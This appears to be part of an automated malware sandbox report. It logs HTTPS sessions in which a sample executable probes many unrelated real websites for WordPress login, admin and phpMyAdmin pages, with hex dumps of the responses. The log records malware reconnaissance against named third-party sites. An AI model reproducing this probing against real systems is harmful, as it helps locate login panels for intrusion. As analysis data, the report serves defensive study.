                                                                                                                                                                                                    2023-11-26 06:00:00 UTC1021INData Raw: 33 46 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 65 61 63 68 20 52 65 63 72 75 69 74 6d 65 6e 74 20 42 2e 56 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 4a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63
                                                                                                                                                                                                    Data Ascii: 3F6<!DOCTYPE html><html lang="nl"><head><title>Beach Recruitment B.V.</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/Javascript"><meta http-equiv="Content-Style-Type" c
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC8200INData Raw: 32 30 30 30 0d 0a 74 6d 65 6e 74 2e 63 6f 6d 22 3e 0a 3c 21 2d 2d 20 65 6e 64 20 63 61 6e 6f 6e 69 63 61 6c 20 6c 69 6e 6b 20 2d 2d 3e 0a 0a 3c 21 2d 2d 20 72 65 6d 61 72 6b 3a 20 73 74 61 72 74 20 4a 53 72 65 70 6f 73 69 74 6f 72 79 20 61 75 74 6f 20 67 65 6e 65 72 61 74 65 64 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 61 63 68 72 65 63 72 75 69 74 6d 65 6e 74 2e 63 6f 6d 2f 5f 6a 61 76 61 73 63 72 69 70 74 5f 67 6c 6f 62 61 6c 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 61 63 68 72 65 63 72 75 69 74 6d 65 6e 74 2e 63 6f 6d 2f 5f 6a 61 76 61 73 63 72 69 70 74 5f 67 6c 6f 62 61 6c 2f 63 68 6f 73
                                                                                                                                                                                                    Data Ascii: 2000tment.com">... end canonical link -->... remark: start JSrepository auto generated --><script src="https://www.beachrecruitment.com/_javascript_global/jquery.js"></script><script src="https://www.beachrecruitment.com/_javascript_global/chos
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC4308INData Raw: 31 30 43 43 0d 0a 63 61 74 2f 61 6c 6c 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 3c 53 54 52 49 4b 45 3e 42 65 6b 69 6a 6b 20 61 6c 6c 65 20 76 61 63 61 74 75 72 65 73 3c 2f 53 54 52 49 4b 45 3e 3c 2f 41 3e 3c 2f 50 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 21 2d 2d 4c 49 4e 4b 53 2d 2d 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 49 74 65 6d 43 6f 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 46 6f 74 6f 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 73 74 79 6c 65 3d 22 22 20 61 6c 74 3d 22 22 20 74 69 74 6c 65 3d 22 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 38 35 30 22 20 73
                                                                                                                                                                                                    Data Ascii: 10CCcat/all" target="_self"><STRIKE>Bekijk alle vacatures</STRIKE></A></P></div></div></div>...LINKS--></div><div class="tItemCon"><div class="tFoto"><img style="" alt="" title="" width="1920" height="850" s
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC2697INData Raw: 41 38 32 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 57 6f 72 64 20 6a 73 6c 4b 65 79 77 6f 72 64 20 6a 73 6c 43 68 61 70 6f 22 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 73 6c 43 6c 65 61 6e 65 72 20 6a 73 6c 4b 77 43 6c 65 61 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 43 6f 6e 74 61 69 6e 65 72 20 6a 73 6c 49 74 65 6d 43 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 54 69 74 6c 65 20 6a 73 6c 46 75 6e 63 74 69 6f 6e 4e 61 6d 65 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 61 63 68 72 65 63 72 75 69 74 6d 65
                                                                                                                                                                                                    Data Ascii: A82<div class="hookItemWord jslKeyword jslChapo"></div><div class="jslCleaner jslKwCleaner"></div></div><div class="hookItemContainer jslItemContainer"><div class="hookItemTitle jslFunctionName"><a href="https://www.beachrecruitme
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC10599INData Raw: 32 39 35 46 0d 0a 6e 61 67 65 72 20 41 61 72 64 61 70 70 65 6c 65 6e 20 49 6e 6b 6f 6f 70 20 28 44 75 69 74 73 6c 61 6e 64 29 20 2f 20 46 61 72 6d 20 46 72 69 74 65 73 3c 2f 61 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 0a 09 09 0a 09 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6f 6b 49 74 65 6d 57 6f 72 64 20 6a 73 6c 4b 65 79 77 6f 72 64 20 6a 73 6c 4c 6f 63 61 74 69 6f 6e 22 3e 0a 09 09 09 3c 73 70 61 6e 3e 69 6e 3c 21 2d 2d 53 69 6e 67 6c 65 57 6f 72 64 4c 69 6e 6b 31 2d 2d 3e 3c 2f 73 70 61 6e 3e 56 65 72 74 72 6f 75 77 65 6c 69 6a 6b 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 0a 09 09 0a 09 09 0a 09 09 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 73 6c 43 6c 65 61 6e 65 72 20 6a 73 6c 4b 77 43 6c 65 61 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a
                                                                                                                                                                                                    Data Ascii: 295Fnager Aardappelen Inkoop (Duitsland) / Farm Frites</a></div><div class="hookItemWord jslKeyword jslLocation"><span>in...SingleWordLink1--></span>Vertrouwelijk</div><div class="jslCleaner jslKwCleaner"></div>
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    564192.168.2.45635274.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC172OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC456INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 06:00:00 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://himontessori.com/wp-json/>; rel="https://api.w.org/"X-Redirect-By: WordP


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    565192.168.2.456390185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC171OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC300INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 58 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 58 2d 43
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=0Expires: Sun, 26 Nov 2023 06:00:00 GMTVary: Accept-EncodingX-Cache-Status: MISSX-C
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC634INData Raw: 32 36 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69
                                                                                                                                                                                                    Data Ascii: 26e<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="descri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    566192.168.2.456391185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC172OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC301INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 58 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 58 2d 43
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=0Expires: Sun, 26 Nov 2023 06:00:00 GMTVary: Accept-EncodingX-Cache-Status: MISSX-C
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC634INData Raw: 32 36 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69
                                                                                                                                                                                                    Data Ascii: 26e<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="descri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    567192.168.2.45641745.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC176OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC856INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 67 65 3a 20 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sun, 26 Nov 2023 06:00:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeage: 0cache-control: no-store, no-cache, must-revalidatecontent-security-policy: upgrade-in
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC7882INData Raw: 31 65 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4c 61 77 20 46 69 72 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                    Data Ascii: 1ec2<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Law Firm &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javas
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC593INData Raw: 32 34 61 0d 0a 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 77 70 2d 75 74 69 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 33 2e 32 27 20 69 64 3d 27 77 70 2d 75 74 69 6c 2d 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 69 64 3d 27 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 20 3d 20 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 39 38 32 35 38 33 39 63 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72
                                                                                                                                                                                                    Data Ascii: 24aipt' src='https://engel-firm.com/wp-includes/js/wp-util.min.js?ver=6.3.2' id='wp-util-js'></script><script type='text/javascript' id='user-profile-js-extra'>/* <![CDATA[ */var userProfileL10n = {"user_id":"0","nonce":"f49825839c"};/* ... */</scr
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    568192.168.2.456363120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC244OUTGET /login/?page=%2Fwp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=0pfpv6fic6tscei8l2krgncvto
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC542INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 33 20 53 65 65 20 4f 74 68 65 72 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 303 See OtherServer: nginxDate: Sun, 26 Nov 2023 06:00:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                    2023-11-26 06:00:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    569192.168.2.456432162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC184OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC258INData Raw: 48 54 54 50 2f 31 2e 31 20 34 31 32 20 50 72 65 63 6f 6e 64 69 74 69 6f 6e 20 46 61 69 6c 65 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 55 73 65 72 2d 41 67 65 6e 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 32 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 412 Precondition FailedDate: Sun, 26 Nov 2023 06:00:00 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeAccept-Ranges: bytesVary: User-AgentContent-Length: 606Content-Type: text/html; charset=iso-8859-2Content-Language: en
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC606INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 31 32 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 34 31 32 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 0a 3c 70 3e 59 6f 75 72 20 72 65 71 75 65 73 74 20 67 6f 74 20 66 69 6c 74 65 72 65 64 20 6f 75 74 20 64 75 65 20 74 6f 20 70 6f 73 73 69 62 6c 65 20 73 65 63 75 72 69 74 79 20 69 73 73 75 65 73 2e 3c 2f 70 3e 0a 0a 3c 70 3e 4f 6e 65 20 6f 72 20 6d 6f 72 65 20 74 68 69 6e 67 73 20 69 6e 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 77 65 72 65 20 73 75 73 70 69 63 69 6f 75 73 20 28 64 65 66 65 63 74 69 76 65 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 2c 20 69 6e 76 61 6c 69 64 20 63 6f 6f 6b 69 65 73 2c 20 62 61 64 20 70 61 72 61 6d 65 74 65 72
                                                                                                                                                                                                    Data Ascii: <html><head><title>412 Error</title></head><body><h1>412 Error</h1><p>Your request got filtered out due to possible security issues.</p><p>One or more things in your request were suspicious (defective request header, invalid cookies, bad parameter


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    570192.168.2.45640934.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC175OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
